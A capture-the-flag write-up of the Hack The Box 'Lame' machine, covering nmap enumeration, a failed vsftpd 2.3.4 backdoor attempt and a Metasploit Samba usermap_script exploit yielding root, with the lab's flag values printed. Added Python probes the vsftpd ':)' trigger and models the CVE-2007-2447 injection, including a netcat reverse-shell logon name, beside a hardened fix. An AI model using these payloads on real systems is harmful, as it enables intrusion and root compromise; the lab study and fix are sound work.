
Hackthebox Lame

Posted: 2023-07-11 23:00:52


NMAP Scanning

┌──(kali㉿kali)-[~/Desktop/Hackthebox/Lame]
└─$ sudo nmap -sS -sV -sC -p- 10.129.145.147 -oN nmap_full_scan
[sudo] password for kali: 
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-11 10:06 EDT
Nmap scan report for localhost (10.129.145.147)
Host is up (0.25s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.10.14.62
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: lame
|   NetBIOS computer name: 
|   Domain name: hackthebox.gr
|   FQDN: lame.hackthebox.gr
|_  System time: 2023-07-11T10:21:07-04:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 2h09m07s, deviation: 2h49m46s, median: 9m04s
|_smb2-time: Protocol negotiation failed (SMB2)

Getting a shell

┌──(kali㉿kali)-[~/Desktop/Hackthebox/Lame]
└─$ searchsploit vsftpd 2.3.4                                  
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                             |  Path
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
vsftpd 2.3.4 - Backdoor Command Execution                                                                                  | unix/remote/49757.py
vsftpd 2.3.4 - Backdoor Command Execution (Metasploit)                                                                     | unix/remote/17491.rb

There is a Metasploit module for this (exploit/unix/ftp/vsftpd_234_backdoor, the one still selected in the prompt further down), but it failed against this box. The reason is worth knowing: the backdoor in the trojaned vsftpd 2.3.4 release is triggered by a USER value containing ":)", but the shell it spawns listens on a separate port, TCP/6200, not on the FTP control connection. The scan above shows every port other than the five open ones as filtered, so even if the trigger fires the shell port is unreachable and the module reports failure.
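To make that failure mode concrete, here is an added probe (not code from the write-up or from the Exploit-DB scripts listed above) that sends the ":)" trigger and then checks whether the backdoor's shell port accepts a connection. The fake FTP server, host and ports are constructed so the script runs offline; the real backdoor is of course not present on it.

```python
"""Check whether the vsftpd 2.3.4 backdoor shell is actually reachable.

Added example. The trojaned vsftpd 2.3.4 fires on a USER value containing
":)" and then binds a root shell on TCP/6200 on the server, separate from
the FTP control connection. When port 6200 is filtered by a firewall the
trigger still runs but nothing can connect to the shell, which is what a
failed Metasploit run looks like. The FakeVsftpd class below is a
constructed stand-in for the FTP side only, so the probe can run offline.
"""
import socket
import threading

TRIGGER_USER = b"USER anonymous:)\r\n"   # ":)" anywhere in the name fires the backdoor


def trigger_backdoor(host: str, port: int = 21, timeout: float = 3.0) -> str:
    """Open the control connection, send the smiley USER, return the banner."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        banner = s.recv(1024).decode(errors="replace").strip()
        s.sendall(TRIGGER_USER)
        s.recv(1024)                      # 331 Please specify the password.
        s.sendall(b"PASS x\r\n")          # the backdoor has already forked by now
        try:
            s.recv(1024)
        except socket.timeout:
            pass                          # a backdoored server may stay silent here
    return banner


def shell_port_open(host: str, port: int = 6200, timeout: float = 3.0) -> bool:
    """True only if the backdoor shell port accepts a TCP connection."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:                       # refused, filtered (timeout) or unreachable
        return False


def probe_vsftpd_backdoor(host: str, ftp_port: int = 21, shell_port: int = 6200,
                          timeout: float = 3.0) -> dict:
    """Trigger first, then test the shell port; both results are returned."""
    banner = trigger_backdoor(host, ftp_port, timeout)
    return {
        "banner": banner,
        "looks_like_2_3_4": "2.3.4" in banner,
        "shell_reachable": shell_port_open(host, shell_port, timeout),
    }


class FakeVsftpd:
    """Constructed stand-in: answers one FTP login attempt, has no backdoor."""

    def __init__(self, banner: bytes = b"220 (vsFTPd 2.3.4)\r\n"):
        self.sock = socket.socket()
        self.sock.bind(("127.0.0.1", 0))
        self.sock.listen(1)
        self.port = self.sock.getsockname()[1]
        self.banner = banner
        threading.Thread(target=self._serve, daemon=True).start()

    def _serve(self) -> None:
        conn, _ = self.sock.accept()
        with conn:
            conn.sendall(self.banner)
            conn.recv(1024)               # USER ...
            conn.sendall(b"331 Please specify the password.\r\n")
            conn.recv(1024)               # PASS ...
            conn.sendall(b"530 Login incorrect.\r\n")
        self.sock.close()


def unused_port() -> int:
    """A local port nothing listens on, modelling a closed or filtered 6200."""
    s = socket.socket()
    s.bind(("127.0.0.1", 0))
    port = s.getsockname()[1]
    s.close()
    return port


if __name__ == "__main__":
    fake = FakeVsftpd()
    print(probe_vsftpd_backdoor("127.0.0.1", fake.port, unused_port()))
```

Against a real target you would call probe_vsftpd_backdoor(target_ip) with the default ports; a banner containing 2.3.4 together with shell_reachable False is the Lame situation, and it tells you to move on rather than retry the module.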

Look back at the Nmap output instead: port 445 identifies the SMB service as Samba 3.0.20-Debian, and that version has its own entries in searchsploit:

┌──(kali㉿kali)-[~/Desktop/Hackthebox/Lame]
└─$ searchsploit samba 3.0.20            
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                             |  Path
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Samba 3.0.10 < 3.3.5 - Format String / Security Bypass                                                                     | multiple/remote/10095.txt
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit)                                           | unix/remote/16320.rb
Samba < 3.0.20 - Remote Heap Overflow                                                                                      | linux/remote/7701.txt
Samba < 3.6.2 (x86) - Denial of Service (PoC)                                                                              | linux_x86/dos/36741.py
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

Metasploit also has a module for the Samba bug, exploit/multi/samba/usermap_script (CVE-2007-2447). It targets the non-default smb.conf option "username map script": Samba 3.0.20 through 3.0.25rc3 passes the client-supplied logon name to that script through a shell, so a logon name containing backticks executes arbitrary commands as the smbd user. No credentials are needed because the mapping runs before the password is checked, and on this box smbd runs as root:

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > use exploit/multi/samba/usermap_script
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf6 exploit(multi/samba/usermap_script) > show options 

Module options (exploit/multi/samba/usermap_script):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   CHOST                     no        The local client address
   CPORT                     no        The local client port
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT    139              yes       The target port (TCP)


Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.0.2.15        yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic



View the full module info with the info, or info -d command.

msf6 exploit(multi/samba/usermap_script) > set LHOST 10.10.14.62
LHOST => 10.10.14.62
msf6 exploit(multi/samba/usermap_script) > set LPORT  5555
LPORT => 5555
msf6 exploit(multi/samba/usermap_script) > set RHOSTS  10.129.145.147
RHOSTS => 10.129.145.147
msf6 exploit(multi/samba/usermap_script) > exploit

[*] Started reverse TCP handler on 10.10.14.62:5555 
[*] Command shell session 1 opened (10.10.14.62:5555 -> 10.129.145.147:49206) at 2023-07-11 10:36:57 -0400

id   
uid=0(root) gid=0(root)


root@lame:/root# cat root.txt
09a885cf7c8bfbd4d21cbffe69eef798
root@lame:/home# cd makis
root@lame:/home/makis# ls -alh
total 28K
drwxr-xr-x 2 makis makis 4.0K Mar 14  2017 .
drwxr-xr-x 6 root  root  4.0K Mar 14  2017 ..
-rw------- 1 makis makis 1.1K Mar 14  2017 .bash_history
-rw-r--r-- 1 makis makis  220 Mar 14  2017 .bash_logout
-rw-r--r-- 1 makis makis 2.9K Mar 14  2017 .bashrc
-rw-r--r-- 1 makis makis  586 Mar 14  2017 .profile
-rw-r--r-- 1 makis makis    0 Mar 14  2017 .sudo_as_admin_successful
-rw-r--r-- 1 makis makis   33 Jul 11 10:08 user.txt
root@lame:/home/makis# cat user.txt
bf43559a3fed24e30fe5cbfdafef3c67
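The session above shows the result but not why a logon name is enough. The following is an added example, not the write-up's code and not Samba's source: it models in Python the shell-out that made "username map script" exploitable, with the vulnerable form (script path and logon name concatenated and run through /bin/sh -c, as the affected Samba versions did) beside a hardened form that validates the name and execs the script with argv so no shell ever parses it. The map script (echo), the marker file and the usernames are constructed for an offline run.

```python
"""Root cause of the Samba 'username map script' bug (CVE-2007-2447).

Added example. Samba 3.0.20-3.0.25rc3 built a shell command line from the
configured script path and the logon name from the SMB session setup and
ran it through /bin/sh -c before authenticating the user. A logon name of
    /=`nohup nc -e /bin/sh 10.10.14.62 5555`
therefore runs the backticked command as smbd's user (root on Lame); that
is the shape exploit/multi/samba/usermap_script sends. Nothing here talks
SMB: the two functions only model the shell-out itself.
"""
import os
import re
import subprocess
import tempfile


def usermap_payload(command: str) -> str:
    """Logon name in the shape the Metasploit module uses."""
    return f"/=`nohup {command}`"


def vulnerable_username_map(map_script: str, username: str) -> str:
    """Models smbd concatenating script and name and handing it to /bin/sh -c."""
    proc = subprocess.run(f"{map_script} {username}", shell=True,
                          capture_output=True, text=True)
    return proc.stdout.strip()


# Conservative allow-list for a logon name; anything else is refused outright.
SAFE_USERNAME = re.compile(r"[A-Za-z0-9._@-]{1,64}")


def hardened_username_map(map_script: str, username: str) -> str:
    """Reject shell metacharacters, then exec the script with argv and no shell."""
    if not SAFE_USERNAME.fullmatch(username):
        raise ValueError(f"refusing to map username {username!r}")
    proc = subprocess.run([map_script, username], shell=False,
                          capture_output=True, text=True)
    return proc.stdout.strip()


def demo() -> dict:
    """Run both forms against an injected name; a marker file records execution."""
    with tempfile.TemporaryDirectory() as tmp:
        marker = os.path.join(tmp, "pwned")          # constructed marker path
        evil_name = usermap_payload(f"touch {marker}")

        vuln_out = vulnerable_username_map("echo", evil_name)
        vuln_ran = os.path.exists(marker)             # backticks were evaluated
        if vuln_ran:
            os.remove(marker)

        try:
            hardened_username_map("echo", evil_name)
            rejected = False
        except ValueError:
            rejected = True
        hardened_ran = os.path.exists(marker)         # stays False: no shell involved

    return {
        "vulnerable_output": vuln_out,                # "/=" : the command ran, output was empty
        "vulnerable_ran_injected_command": vuln_ran,
        "hardened_rejected": rejected,
        "hardened_ran_injected_command": hardened_ran,
    }


if __name__ == "__main__":
    print(demo())
```

The argv form is the real fix (even a name the regex let through would reach the script as one literal argument); the allow-list is defence in depth. The same injected logon name can be handed to smbclient with -U for a manual exploit, which is useful when Metasploit is unavailable.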

Lessons learned

  1. For a Samba service, do not assume the only things to do are listing shares with smbclient or pulling candidate usernames with enum4linux. Note the exact version number and check whether that version has a known vulnerability.

  2. For vsftpd 2.3.4, as soon as I saw that version I wrongly assumed the foothold had to be that service. The result on this box shows that kind of preconception was completely wrong.

From: https://www.cnblogs.com/jason-huawen/p/17546193.html
